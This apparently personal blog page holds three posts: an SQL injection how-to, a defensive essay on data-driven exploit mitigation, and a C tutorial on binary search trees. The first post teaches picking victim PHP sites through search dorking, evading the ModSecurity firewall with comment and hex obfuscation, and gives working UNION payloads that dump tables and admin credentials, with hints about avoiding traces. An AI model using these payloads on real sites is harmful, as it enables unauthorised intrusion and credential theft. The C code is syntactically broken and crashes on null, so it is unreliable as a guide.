Tuesday, April 4, 2017

Hacking PHP Website using SQL Injection

Hi Guys,

Recently, I tried my hands on with performing SQL injection on PHP websites.

So lets talk about SQL Injection first.

SQL injection (SQLi) is an application security weakness that allows attackers to control an application’s database – letting them access or delete data, change an application’s data-driven behavior, and do other undesirable things – by tricking the application into sending unexpected SQL commands.
SQL injection weaknesses occur when an application uses untrusted data, such as data entered into web form fields, as part of a database query. When an application fails to properly sanitize this untrusted data before adding it to a SQL query, an attacker can include their own SQL commands which the database will execute. Such SQLi vulnerabilities are easy to prevent, yet SQLi remains a leading web application risk, and many organizations remain vulnerable to potentially damaging data breaches resulting from SQL injection.

If you are not aware of SQL please practice SQL here, and if you are not aware of basic SQL Injection practice here

But, what many websites fail to mention is the possibility of Web Application Firewall(WAF). So, WAF is the first level of filtering which defines the conversion rules for HTML content and HTTP/HTTPS requests. If a HTML content or Network Request contains any script tags or sql queries or unwanted keywords, the same gets rejected at the very first level by the WAF. for more knowledge please refer https://www.owasp.org/index.php/Web_Application_Firewall

In our case because we will be playing with the GET request of a web page a lot by passing a WAF is extremely important.

Step 1: how to choose a victim?
  • go to www.google.com and type .php?id=1
    The reason to perform this operation is to find out victims
  • Now, out so thousands how do you choose choose a victim, simply by checking is an SQL exception is not handled by the user at the top end and to do that simply at ' at the end of the request. For example:
    1. link1
    2. link2
  • I have done my homework on link2 so i'll pick up this as my victim, because the error here is bloody clear which is great for troubleshooting..!! :D
  • So the most important concepts which we are exploiting here is the independence to use stacked commands which is allowed in MySQL, and because the server runs on MySQL this will be our ideal target
  • Lets try to modify the link to such that it looks like this <DOMAIN>/research.php?id%3D-1%20and%20select%20*%20from%20admin and observer that there is an exception given to us but it's not from MySQL it's from Mod Security(https://modsecurity.org/) which is an open source WAF
  • Now how do we by pass it, i found that Mod Security was not only able to identify SQL strings such as union, select, from etc. but it was also able to identify the same if they were hexed. So what do i do now? I found that you can use PHP comment tags in between to confuse Mod Security into believing that the string coming to it is safe to execute. BOOM..!!
  • Now Try this, So to list all tables in our DB here we can <DOMAIN>/....php?id=.1+/*!50000union*/+select+concat/**/(0x3c62723e496e6a6563746564204279204a41434b3c62723e56657273696f6e203a3a20,version(),0x3c62723e4461746162617365203a3a20,database(),0x3c62723e55736572203a3a20,user(),(SELECT concat/**/(@x:=0x00,if((SELECT count(*) from /*!00000information_schema.columns*/ where table_schema=database() and @x:=concat/**/(@x,0x3c62723e,database(),0x203a3a20,table_name,0x203a3a20,column_name)),0x00,0x00),@x))),22222,33333,444444--+-
    It will be great to first understand what this command is doing and the use of union is the best way to execute custom query keeping in mind the number of columns in the preceding query. Awesome now you can see all it's tables (check out the below screenshot)
  • Now that you have the information about all the DB let's start digging data from this DB. So, I tried to read from the Admin Table where I can see the Username, password, email_address and First Name, Last Names, and how do you do that just tweak the above query to match your requirements like in my case it is
    <DOMAIN>/.....php?id=.1+/*!50000union*/+%28/*!50000select*/%20password%20,admin_fname,admin_lname,%20email_address%20/*!50000from*/%20admin%29 and look what I got
  • This is the encrypted password stored into the database ,... WOW..!! :D Well I know MySQL passwords are not passwords but hashes and are hard to Decrypt, but if you get to know a technique do let me know :)
  • Now People usually end up INSERTing into the DB which can be bad because they would end up leaving a rather more noticeable trace, I'm sure you'll find a work around to that :D
Please comment and share if you found this helpful :)


Sunday, February 12, 2017

Must Have Data-Driven Software Defense Strategy to Identify Vulnerable Code

“Security mitigation planning is the process of developing options and actions to enhance experience and reduce threats to the project objectives.”  Although Security Bulletins and Exploitability Indexes help customers to assess potential risks but these reactive measures are not enough. With every security mitigation shipped there is an investment associated to increase the cost to exploit the same vulnerability. Hence, root cause analysis of vulnerability plays a vital role in defining a security mitigation, this is where data analytics on historical vulnerability reports and evaluation of Exploits/POCs/Zero Days becomes critical.
In this talk I will elaborate Multi-Level Exploit Analysis process; organizations must have and use before planning any security mitigation in application code or custom memory managers. These strategies are well thought of and are manifestation of suggestions from chief organizations such as Microsoft. Incorporating this strategy is a great value addition and following actions can help organizations and individuals significantly reduce the risk they face from Zero day exploits.

Keywords:  Multi-Level Exploit Analysis, Vulnerability Analysis, Data Analytics on Security Mitigation, Data-Driven Strategy, Mitigation Progress Monitoring
Must Have Data-Driven Software Defense Strategy to Identify Vulnerable Code:
Security is always relative to the information and services being protected, the skills and resources of adversaries, and the costs of potential assurance remedies via mitigation technique. In Modern era where the profit motive underlies most malicious exploitation activity, effective risk management becomes fundamental. Although 99% of the bugs are caught using functional, Blackbox testing and advanced techniques such as fuzzing and static code analysis, it is this 1% which are difficult to discover for testers and extremely valuable for exploits.


Multi-Dimensional Exploit Analysis:

At Blackhat 2016 (USA), Microsoft Presented Data-Driven Software Defense Process illustrating an overview on what strategy organizations should use to identify root cause and perform data analytics on historical data.


Security Mitigation Planning, Implementation and Progress Monitoring:

Security mitigation planning, implementation, and monitoring has been represented below in fig.i is a manifestation of Data-Driven Software Defense Process as a flow diagram.

 Exploit Identification is extremely important, involves collecting:
1.     Crashes reported collected by Platforms using:
a.     Microsoft WER (Windows Error Reporting)
b.     Apple BugReport
c.     Mozilla Crash-Stats
d.     Google Error Reporting
2.     Threat Intelligence Report from Security Partners
a.     Responsibly disclosed security incidences/researches
b.     Zero day exploits
c.     Open Source/Social Media

b.    Exploit Impact:
Exploit Impact is the crucial Step where we perform the following activities:
1.     Bucketizing similar crashes to form a list of unique crash stacks and number of crashes observed in the live application state to remove duplicity.

2.     Collating responsibly disclosed security incidences/researches and Zero day exploits to assign vulnerability type, criticality.

Now that we have the raw-data collated for real-time crashes observed on the application and historical data on responsibly disclosed security incidences we can now work on making sense out of this data. The next steps can be:
1.     After manual evaluation and filtering, list of all vulnerable APIs reported can be collated into one table with exploit_id associated and bucket_id(s) to define susceptibility of an API. Crashing_api_table:
Possible Scenarios can be summarized into these three primary cases in Figures i,ii,iii:

fig(i): describes point of intersection between bucket crash stack and exploit crash stack trace

Figure(ii): describes point of deviation between bucket crash stack and exploit crash stack trace

Figure(iiI): describes point of conjunction between bucket crash stack and exploit crash stack trace

c.     Exploit Criticality:
Criticality for every security incidence reported depends on the type of vulnerability and area impacted by it, unless it’s not a Zero day which needs to get fixed and shipped immediately, and now that we have the health status of every crashing API for every mitigation the decisions become easier with

Priority = Function(Sum_of_all_priorities(exploit_id(s)), crash_count(bucket_id(s)) and,
Vulnerability Popularity Trend in the market shared as research by Threat Intelligence organization.
d.    Security Mitigation:
Mitigation will depend on what strategy to follow and is an organizational decision on how to tackle a type of exploit and what possible measures can be introduced to increase the cost of an attack.

e.     Mitigation Impact & Tracking:

For every mitigation shipped into the market there is an investment associated to increase the cost of generating another exploit in the same code using advanced approaches as described earlier. Thus impact of a mitigation becomes vital to evaluate the quality of the mitigation shipped into the market. Impact of a mitigation starts internally when all the reported security incidences become inoperable followed by tracking new crashes and incidences reported for an api_id inside Crashing_api_table for the latest build(build_id) in the market.

Monday, February 17, 2014

C: Create Binary Search Tree from a Array

Hi, Today we will create a Binary Search Tree, which is nothing but a Sorted Binary Tree. The methods which we have used here are:

  1. Create Tree to iterate the Tree to the length of the array, with a reference to the array and to the root of the Tree
  2. Create a Method to create a node and on the basis of the value at the index in the array and condition to put the node in the Tree should satisfy 
  3. Print theTree
#include <stdio.h>
#include <stdlib.h>

struct BST
    struct BST* left;
    int info;
    struct BST* right;

void createTree(struct BST*, int*, int);
void makeNode(struct BST*, int*);
void printTree(struct BST*);

int main()
    int arr[100] = {6,5,3,7,9,4,1,10};
    struct BST* root = (struct BST*) malloc(sizeof(struct BST));
    root->info = arr[0];
    root->left = root->right = NULL;
    createTree(root, arr, 7);
    return 0;

void createTree(struct BST* root, int* arr_ref, int arr_len)
    struct BST* temproot = root;
    while(arr_len > 0)
        makeNode(temproot, arr_ref);

void makeNode(struct BST* root, int* arr_ref)
    struct BST* temp = root;
        if(temp->info > *arr_ref)
            if(temp->left == NULL)
                struct BST* newnode = (struct BST*) malloc(sizeof(struct BST));
                newnode->info = *arr_ref;
                newnode->left = newnode->right = NULL;
                temp->left = newnode;
                makeNode(temp->left, arr_ref);
        else if(temp->info <= *arr_ref)
            if(temp->right == NULL)
                struct BST* newnode = (struct BST*) malloc(sizeof(struct BST));
                newnode->info = *arr_ref;
                newnode->left = newnode->right = NULL;
                temp->right = newnode;
                makeNode(temp->right, arr_ref);

void printTree(struct BST* root)
    struct BST* temp = root;
    if(temp == NULL)
        printf(" %d ",temp->info);